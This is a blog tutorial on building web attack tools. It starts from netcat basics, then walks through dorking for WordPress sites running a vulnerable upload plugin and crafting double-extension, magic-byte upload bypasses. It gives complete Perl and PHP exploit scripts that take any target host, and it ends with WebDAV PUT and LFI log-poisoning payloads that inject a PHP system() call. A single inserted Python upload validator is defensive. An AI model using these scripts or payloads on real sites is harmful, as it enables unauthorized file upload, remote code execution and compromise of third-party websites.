Thursday, 15 January 2015

How to Build a Web Hacking Tool

netcat, alias the Swiss-army knife for TCP/IP, is a utility used for all sorts of tasks involving the TCP or UDP protocols. It can open TCP connections, send UDP packets, listen on TCP and UDP ports, perform port scanning, and it works with both IPv4 and IPv6.

Basic Netcat commands

Code:
-4              Use IPv4
-6              Use IPv6
-D              Enable the debug socket option
-d              Detach from stdin
-h              This help text
-I length       TCP receive buffer length
-i secs         Delay interval for lines sent, ports scanned
-k              Keep inbound sockets open for multiple connect
-l              Listen mode, for inbound connects
-n              Suppress name/port resolutions
-O length       TCP send buffer length
-P proxyuser    Username for proxy authentication
-p port         Specify local port for remote connects
-r              Randomize remote ports
-s addr         Local source address
-T toskeyword   Set IP Type of Service
-C              Send CRLF as line-ending
-t              Answer TELNET negotiation
-U              Use UNIX domain socket
-u              UDP mode
-V rtable       Specify alternate routing table
-v              Verbose
-w secs         Timeout for connects and final net reads
-X proto        Proxy protocol: "4", "5" (SOCKS) or "connect"
-x addr[:port]  Specify proxy address and port
-z              Zero-I/O mode [used for scanning]
Port numbers can be individual or ranges: lo-hi [inclusive]

FILE TRANSFER

~client# nc -lp 1234 > file.tar.gz
** l = listen
** p = port
~server# nc -w 1 ip.client.com 1234 < file.tar.gz
** w = timeout

CLONING A HARD DISK
~client# nc -l -p 1234 | dd of=/dev/sda
~server# dd if=/dev/sda | nc ip.client.com 1234
** I have never tried this myself


PORT SCANNER
~server# nc -v -w 1 localhost -z 1-1000
~server# nc -v -n -z -w 1 192.168.1.2 1-1000

CHAT BETWEEN CLIENT AND SERVER
~client# nc -lp 1234
~server# nc ip.client.com 1234

SPOOFING HTTP Headers

Method GET

~client# nc server.com 80
GET /index.php?x=exp HTTP/1.1
Host: example.com
Referer: example.com
User-Agent: my-browser

Method POST

Code:
~client# nc localhost 80
POST /index.php HTTP/1.1
Host: localhost
Referer: localhost
User-Agent: Firefox
Cookie: PHPSESSID=c1d9f9192c1650ab7b3c71c14268aa44
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Connection: close

username=admin&password=admin&submit=Login

The syntax must be exact: a space after the colon (:), a capital letter at the start of each header name, and the extra CRLF/Enter (the blank line) that ends the request.

** For HTTP headers, if the request succeeds the response will start with "HTTP/1.1 200 OK", like this:
Code:
HTTP/1.1 200 OK
Date: Fri, 07 Sep 2012 09:58:06 GMT
Server: Apache/2.2.21 (Win32) DAV/2 mod_ssl/2.2
perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.8
Content-Length: 1961
Connection: close
Content-Type: text/html


Download and extract the file, then copy it to

%systemroot%\system32

or

C:\Windows\System32

and run it from the DOS prompt (cmd).

Preparation

Instead of nc you can also use Tamper Data / Live HTTP Headers.

First we look for a bug on exploit-db, picked at random. Then we look for a vulnerable site in Google's search results, using that dork as the keyword. For example:
- inurl:/wp-content/plugins/user-meta/framework/helper/uploader.php -source -trunk
- intext:user-meta -source -trunk
Just pick an easy one.

Let's try opening the site with an ordinary request via netcat:
Code:
C:\Users\ANASKI>nc www.victim.com 80
GET /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Connection: keep-alive
I received the following response from the site:
Code:
HTTP/1.1 200 OK
Date: Mon, 01 Oct 2012 07:15:49 GMT
Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8o
X-Powered-By: PHP/5.2.13-pl1-gentoo
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

23
{"error":"No files were uploaded."}
0

Ok, we already have some information about the target: it turns out the uploader does not require any authorization.
Now let's try uploading a file to that target.

Look at the HTML form behind the request:
Code:
<form action="" method="post" enctype="multipart/form-data">
<input type="file" name="qq" />
<input type="submit" />
</form>
then we adapt it for nc
Code:
C:\Users\ANASKI>nc www.victim.com 80
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Referer: http://victim.com/user-meta.php
Content-Type: multipart/form-data; boundary=---------------------------41184676334
Content-length: 204

-----------------------------41184676334

Content-Disposition: form-data; name="qqfile"; filename="exp.php.jpeg"
Content-Type: sound/midi

Hacked by Tester
-----------------------------41184676334--
the server responds:
Code:
HTTP/1.1 400 Bad Request
Date: Mon, 01 Oct 2012 07:46:25 GMT
Server: Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8o
Content-Length: 475
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Request header field is missing ':' separator.<br />
<pre>
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1</pre>
</p>
<hr>
<address>Apache/2.2.20 (Unix) mod_ssl/2.2.20 OpenSSL/0.9.8o Server at victim.com Port 80</address>
</body></html>
so there was an error in how I typed the request into nc.
Let's check again.

After checking, we repeat until the syntax is right.
For the error codes I have compiled a list:
Code:
1xx    Informational    100    Continue
        101    Switching Protocols
        102    Processing (WebDAV; RFC 2518)
2xx     Success    200    OK
        201    Created
        202    Accepted
        203    Non-Authoritative Information (since HTTP/1.1)
        204    No Content
        205    Reset Content
        206    Partial Content
        207    Multi-Status (WebDAV; RFC 4918)
        208    Already Reported (WebDAV; RFC 5842)
        226    IM Used (RFC 3229)
3xx     Redirection    300    Multiple Choices
        301    Moved Permanently
        302    Found
        303    See Other (since HTTP/1.1)
        304    Not Modified
        305    Use Proxy (since HTTP/1.1)
        306    Switch Proxy
        307    Temporary Redirect (since HTTP/1.1)
        308    Permanent Redirect (approved as experimental RFC)
4xx    Client Error    400    Bad Request
        401    Unauthorized
        402    Payment Required
        403    Forbidden
        404    Not Found
        405    Method Not Allowed
        406    Not Acceptable
        407    Proxy Authentication Required
        408    Request Timeout
        409    Conflict
        410    Gone
        411    Length Required
        412    Precondition Failed
        413    Request Entity Too Large
        414    Request-URI Too Long
        415    Unsupported Media Type
        416    Requested Range Not Satisfiable
        417    Expectation Failed
        418    I'm a teapot (RFC 2324)
        420    Enhance Your Calm (Twitter)
        422    Unprocessable Entity (WebDAV; RFC 4918)
        423    Locked (WebDAV; RFC 4918)
        424    Failed Dependency (WebDAV; RFC 4918)
        425    Unordered Collection (Internet draft)
        426    Upgrade Required (RFC 2817)
        428    Precondition Required (RFC 6585)
        429    Too Many Requests (RFC 6585)
        431    Request Header Fields Too Large (RFC 6585)
        444    No Response (Nginx)
        449    Retry With (Microsoft)
        450    Blocked by Windows Parental Controls (Microsoft)
        451    Unavailable For Legal Reasons (Internet draft)
        451    Redirect (Microsoft)
        494    Request Header Too Large (Nginx)
        495    Cert Error (Nginx)
        496    No Cert (Nginx)
        497    HTTP to HTTPS (Nginx)
        499    Client Closed Request (Nginx)
5xx    Server Error    500    Internal Server Error
        501    Not Implemented
        502    Bad Gateway
        503    Service Unavailable
        504    Gateway Timeout
        505    HTTP Version Not Supported
        506    Variant Also Negotiates (RFC 2295)
        507    Insufficient Storage (WebDAV; RFC 4918)
        508    Loop Detected (WebDAV; RFC 5842)
        509    Bandwidth Limit Exceeded (Apache bw/limited extension)
        510    Not Extended (RFC 2774)
        511    Network Authentication Required (RFC 6585)
        598    Network read timeout error (Unknown)
        599    Network connect timeout error (Unknown)

Let's test again:
Code:
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------23281168279961
Content-Length: 208

-----------------------------23281168279961
Content-Disposition: form-data; name="qq"; filename="hacked.php.jpg"
Content-Type: image/jpeg

hacked by tester
-----------------------------23281168279961--



it worked; now we record that request.

Now let's try to bypass the image filter, for example by using a GIF/JPEG header:

Code:
POST /wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------23281168279961
Content-Length: 214

-----------------------------23281168279961
Content-Disposition: form-data; name="qq"; filename="hacked.php.jpg"
Content-Type: image/jpeg

‰PNGhacked by tester
-----------------------------23281168279961--

or other techniques. Once it gets through, record the request; in the next tutorial we build our own exploit.
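As an added example (not from the original post), here is the server-side check that would have rejected every upload request shown above: it rebuilds the page's multipart bodies in Python (the len() of the body is the Content-Length the page arrives at, 208), verifies Content-Length against the body, inspects every extension segment of the file name so hacked.php.jpg and x.php3.jpeg are refused, and compares the declared type against the file's magic bytes rather than trusting the name or the "‰PNG" prefix. The boundary, field name and file names come from the page; the allowlist, signatures and the benign JPEG stub are constructed here.

```python
import re

CRLF = b"\r\n"
# Script extensions that must not appear in any name segment; accepted image types with MIME and full signature.
SCRIPT_EXT = {"php", "php3", "php4", "php5", "phtml"}
ALLOWED = {
    "jpg": ("image/jpeg", b"\xff\xd8\xff"), "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "png": ("image/png", b"\x89PNG\r\n\x1a\n"), "gif": ("image/gif", b"GIF8"),
}

def build_multipart(boundary, field, filename, content_type, data):
    """Assemble a one-part multipart/form-data body exactly as the raw requests on this page do;
    Content-Length is then just len() of the result (the page's length($postdata))."""
    disposition = b'Content-Disposition: form-data; name="' + field + b'"; filename="' + filename + b'"'
    return (b"--" + boundary + CRLF + disposition + CRLF + b"Content-Type: " + content_type + CRLF
            + CRLF + data + CRLF + b"--" + boundary + b"--" + CRLF)

def parse_multipart(body, boundary):
    """Split a body into (headers, data) parts; raise on a malformed part."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):  # closing delimiter
            break
        head, sep, data = chunk[2:].partition(CRLF + CRLF)  # chunk[2:] skips the CRLF after the delimiter
        if not sep:
            raise ValueError("no blank line between part headers and data")
        headers = {}
        for line in head.split(CRLF):
            name, _, value = line.decode("latin-1").partition(":")
            headers[name.strip().lower()] = value.strip()
        parts.append((headers, data[:-len(CRLF)]))  # drop the CRLF preceding the next delimiter
    return parts

def check_part(headers, data):
    """Return the reasons an uploaded part must be rejected (empty list = accept)."""
    m = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
    if not m:
        return ["no filename in Content-Disposition"]
    # basename only, lower-cased, so smuggled directory components are ignored
    filename = m.group(1).replace("\\", "/").rsplit("/", 1)[-1].lower()
    segments = filename.split(".")
    reasons = []
    # every segment after the first is inspected, so x.php3.jpeg is caught as well
    if any(s in SCRIPT_EXT for s in segments[1:]):
        reasons.append("script extension inside %r" % filename)
    ext = segments[-1] if len(segments) > 1 else ""
    if ext not in ALLOWED:
        reasons.append("extension %r not on the allowlist" % ext)
    else:
        mime, magic = ALLOWED[ext]
        if headers.get("content-type") != mime:
            reasons.append("declared Content-Type does not match the extension")
        if not data.startswith(magic):  # trust the bytes, not the name or the header
            reasons.append("content does not start with the %s signature" % ext)
    return reasons

def validate_upload_request(content_type_header, content_length, body):
    """Check a raw multipart POST the way the uploader discussed on this page should have."""
    m = re.search(r"boundary=([^;\s]+)", content_type_header)
    if not m:
        return ["not multipart/form-data"]
    if content_length != len(body):
        return ["Content-Length %d does not match the %d-byte body" % (content_length, len(body))]
    reasons = []
    for headers, data in parse_multipart(body, m.group(1).encode()):
        reasons += check_part(headers, data)
    return reasons

# Constructed sample requests mirroring the ones on this page (the third is a benign JPEG stub).
BOUNDARY = b"-" * 27 + b"23281168279961"
CT_HEADER = "multipart/form-data; boundary=" + BOUNDARY.decode()
PAGE_BODY = build_multipart(BOUNDARY, b"qq", b"hacked.php.jpg", b"image/jpeg", b"hacked by tester")
PNG_PREFIX_BODY = build_multipart(BOUNDARY, b"qq", b"hacked.php.jpg", b"image/jpeg", b"\x89PNGhacked by tester")
REAL_JPEG_BODY = build_multipart(BOUNDARY, b"qq", b"photo.jpg", b"image/jpeg", b"\xff\xd8\xff\xe0" + b"\0" * 16)
```

Run validate_upload_request(CT_HEADER, len(body), body) on each sample: the two page bodies are rejected on both the double extension and the missing JPEG signature, the stub is accepted.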

Building a Hacking Tool with Perl
Earlier we probed the target/victim with netcat and recorded the raw request data for the exploit. That step can also be done with the Firefox add-ons Live HTTP Headers / Tamper Data, the Acunetix HTTP editor, or similar tools.

for example:
Code:
POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 209

-----------------------------24464570528145
Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"
Content-Type: image/jpeg

Hacked by Tester
-----------------------------24464570528145--
Now we will write it in the Perl programming language.
Code:
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;

# open the connection
my $sock = IO::Socket::INET->new( PeerAddr => "victim.com", PeerPort => "80", Proto => "tcp", Timeout => 0, )
    or die "connection failed: $@\n";
my $enter = "\r\n"; # CRLF, the HTTP line ending
# start the request header
print $sock 'POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1'.$enter;
print $sock 'Host: victim.com'.$enter;
print $sock 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1'.$enter;
print $sock 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'.$enter;
print $sock 'Accept-Language: id,en-us;q=0.7,en;q=0.3'.$enter;
print $sock 'Connection: keep-alive'.$enter;
print $sock 'Referer: http://victim.com/wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php'.$enter;
print $sock 'Content-Type: multipart/form-data; boundary=---------------------------24464570528145'.$enter;
print $sock 'Content-Length: 209'.$enter; # length of the post-data, counted by hand
print $sock $enter;
# build the post-data
print $sock '-----------------------------24464570528145'.$enter;
print $sock 'Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"'.$enter;
print $sock 'Content-Type: image/jpeg'.$enter;
print $sock $enter;
# the file content
print $sock 'Hacked by Tester'.$enter;
print $sock '-----------------------------24464570528145--'.$enter;
# a final CRLF to finish sending
print $sock $enter;

print <$sock>;
close($sock);
Look carefully at the screenshot I have provided.


With a little Perl you can already write your own exploit.
Building the post-data and the Content-Length is of course harder, so here we separate the post-data out into its own variable;
then to get the Content-Length we just use the function length($string).
Code:
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;

# open the connection
my $sock = IO::Socket::INET->new( PeerAddr => "victim.com", PeerPort => "80", Proto => "tcp", Timeout => 0, )
    or die "connection failed: $@\n";
my $enter = "\r\n"; # CRLF, the HTTP line ending
# build the post-data in its own variable
my $postdata = '';
$postdata .= '-----------------------------24464570528145'.$enter;
$postdata .= 'Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"'.$enter;
$postdata .= 'Content-Type: image/jpeg'.$enter;
$postdata .= $enter;
$postdata .= 'Hacked by Tester'.$enter;
$postdata .= '-----------------------------24464570528145--'.$enter;
$postdata .= $enter;

# start the request header
print $sock 'POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1'.$enter;
print $sock 'Host: victim.com'.$enter;
print $sock 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1'.$enter;
print $sock 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'.$enter;
print $sock 'Accept-Language: id,en-us;q=0.7,en;q=0.3'.$enter;
print $sock 'Connection: keep-alive'.$enter;
print $sock 'Referer: http://victim.com/wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php'.$enter;
print $sock 'Content-Type: multipart/form-data; boundary=---------------------------24464570528145'.$enter;
print $sock 'Content-Length: '.length($postdata).$enter; # length computed with the length() function
print $sock $enter;
print $sock $postdata;

print <$sock>;
close($sock);
To make the tool user friendly we naturally have to print whether it succeeded or not, and we also need the host name as input.

Say the success response we receive looks like this:
Code:
{"success":true,"fieldname":null,"filepath":"\/2012\/10\/1349169219.jpeg"}
we take "success":true as the marker
Code:
if ($respone =~ /"success":true/) {
    print "Keinjek";
} else {
    print "Gagal";
}
For the host input we can use the variable $ARGV[0], so to run it we type
perl namascript.pl victim.com

my $host = $ARGV[0];

The complete version looks roughly like this:
Code:
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;

# take the host from the command line: perl namascript.pl victim.com
my $host = $ARGV[0] or die "usage: perl $0 <host>\n";

# open the connection
my $sock = IO::Socket::INET->new( PeerAddr => $host, PeerPort => "80", Proto => "tcp", Timeout => 0, )
    or die "connection failed: $@\n";
my $enter = "\r\n"; # CRLF, the HTTP line ending
# build the post-data
my $postdata = '';
$postdata .= '-----------------------------24464570528145'.$enter;
$postdata .= 'Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"'.$enter;
$postdata .= 'Content-Type: image/jpeg'.$enter;
$postdata .= $enter;
$postdata .= 'Hacked by Tester'.$enter;
$postdata .= '-----------------------------24464570528145--'.$enter;
$postdata .= $enter;

# start the request header
print $sock 'POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1'.$enter;
print $sock 'Host: '.$host.$enter;
print $sock 'User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1'.$enter;
print $sock 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'.$enter;
print $sock 'Accept-Language: id,en-us;q=0.7,en;q=0.3'.$enter;
print $sock 'Connection: keep-alive'.$enter;
print $sock 'Referer: http://'.$host.'/wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php'.$enter;
print $sock 'Content-Type: multipart/form-data; boundary=---------------------------24464570528145'.$enter;
print $sock 'Content-Length: '.length($postdata).$enter; # length computed with the length() function
print $sock $enter;
print $sock $postdata;

# collect the response lines into one string
my $respone = '';
while (my $line = <$sock>) {
    $respone .= $line;
}
close($sock);

# match the response we got with a regex
if ($respone =~ /"success":true/) {
    print "Keinjek";
} else {
    print "Gagal";
}

Once you understand these basic concepts, you can use the classes/modules provided on CPAN, or other simpler ones,
such as the modules
Code:
use HTTP::Request;
use HTTP::Request::Common;
use HTTP::Request::Common qw(POST);
and so on. The next tutorial will use the PHP programming language, God willing.

Building a Hacking Tool with PHP
Earlier we probed the target/victim with netcat and recorded the raw request data for the exploit. That step can also be done with the Firefox add-ons Live HTTP Headers / Tamper Data, the Acunetix HTTP editor, or similar tools.
for example:
Code:
POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------24464570528145
Content-Length: 209

-----------------------------24464570528145
Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"
Content-Type: image/jpeg

Hacked by Tester
-----------------------------24464570528145--

If we write it in the PHP programming language it looks roughly like this.
PHP Code:
<?php
$sock = @fsockopen("victim.com", 80, $err_num, $err_msg, 30);
if (!$sock) {
    die("connection failed: $err_msg\n");
}
$enter = "\r\n"; # CRLF, the HTTP line ending
fwrite($sock, 'POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1'.$enter);
fwrite($sock, 'Host: victim.com'.$enter);
fwrite($sock, 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'.$enter);
fwrite($sock, 'Accept-Language: id,en-us;q=0.7,en;q=0.3'.$enter);
fwrite($sock, 'Connection: keep-alive'.$enter);
fwrite($sock, 'Referer: http://victim.com/wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php'.$enter);
fwrite($sock, 'Content-Type: multipart/form-data; boundary=---------------------------24464570528145'.$enter);
fwrite($sock, 'Content-Length: 209'.$enter); # length of the post-data, counted by hand
fwrite($sock, $enter);
# the post-data: boundary and part headers
fwrite($sock, '-----------------------------24464570528145'.$enter);
fwrite($sock, 'Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"'.$enter);
fwrite($sock, 'Content-Type: image/jpeg'.$enter);
fwrite($sock, $enter);
# the file content
fwrite($sock, 'Hacked by Tester'.$enter);
fwrite($sock, '-----------------------------24464570528145--'.$enter);
# a final CRLF to finish sending
fwrite($sock, $enter);
# read the response from the victim
while (!feof($sock)) {
    print_r(fgets($sock));
}
fclose($sock);
?>
To make it easier to follow, see the screenshot.

In Perl we built a CLI version; now we build the web-based version, which we then run in Mozilla Firefox or another browser. For PHP on the CLI it is the same as Perl,
both use the variable $argv[0], in lowercase.

First we write the HTML that takes the host as input
PHP Code:
<form action="" method="post" >
<input type="text" name="host" />
<input type="submit" />
</form>
Now we receive what the HTML form sent via the $_POST['host'] method
$host = $_POST['host'];

Now we determine whether the tool we built managed to get into the victim or not.
Say the success response from earlier:
Code:
{"success":true,"fieldname":null,"filepath":"\/2012\/10\/1349169219.jpeg"}
we write it roughly like this:

PHP Code:
# decide whether it succeeded or not
if (preg_match("/\"success\":true/", $respone)) {
    echo "berhasil";
} else {
    echo "gagal";
}
To make building the post-data easier, we can put it in an extra variable, as in the Perl version earlier,
and generate the Content-Length value automatically with strlen($postdata).
The result looks roughly like this:
PHP Code:
<form action="" method="post" >
<input type="text" name="host" />
<input type="submit" />
</form>
<?php
$host = @$_POST['host'];
$sock = @fsockopen($host, 80, $err_num, $err_msg, 30);

$respone = '';
if ($sock) {
    $enter = "\r\n"; # CRLF, the HTTP line ending

    # the post-data in its own variable, as in the Perl version
    $postdata  = '-----------------------------24464570528145'.$enter;
    $postdata .= 'Content-Disposition: form-data; name="qqfile"; filename="x.php3.jpeg"'.$enter;
    $postdata .= 'Content-Type: image/jpeg'.$enter;
    $postdata .= $enter;
    $postdata .= 'Hacked by Tester'.$enter;
    $postdata .= '-----------------------------24464570528145--'.$enter;
    $postdata .= $enter;

    fwrite($sock, 'POST /wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php HTTP/1.1'.$enter);
    fwrite($sock, 'Host: '.$host.$enter);
    fwrite($sock, 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'.$enter);
    fwrite($sock, 'Accept-Language: id,en-us;q=0.7,en;q=0.3'.$enter);
    fwrite($sock, 'Connection: keep-alive'.$enter);
    fwrite($sock, 'Referer: http://'.$host.'/wordpress/wp-content/plugins/user-meta/framework/helper/uploader.php'.$enter);
    fwrite($sock, 'Content-Type: multipart/form-data; boundary=---------------------------24464570528145'.$enter);
    fwrite($sock, 'Content-Length: '.strlen($postdata).$enter); # computed from the post-data with strlen()
    fwrite($sock, $enter);
    # send the post-data
    fwrite($sock, $postdata);

    # collect the response as one string
    while (!feof($sock)) {
        $respone .= @fgets($sock);
    }
    fclose($sock);
}

# decide whether it succeeded or not
if (preg_match("/\"success\":true/", $respone)) {
    echo "berhasil";
} else {
    echo "gagal";
}
?>

Once you understand this basic concept, also try the curl functions, which are simpler,
and try other requests too, such as LFI, SQL injection and so on.

PUT on WebDAV
Code:
PUT /exp.txt HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
Content-Length: xxx

RAW DATA

OPTIONS on WebDAV
Code:
OPTIONS / HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: id,en-us;q=0.7,en;q=0.3
Connection: keep-alive
LFI
Code:
GET /index.php?page=../../logs/pc.pasbar.com HTTP/1.1
Host: victim.com
XC-RCE: ls -laF
User-Agent: <?php @system(\$_SERVER['HTTP_XC_RCE'])?>
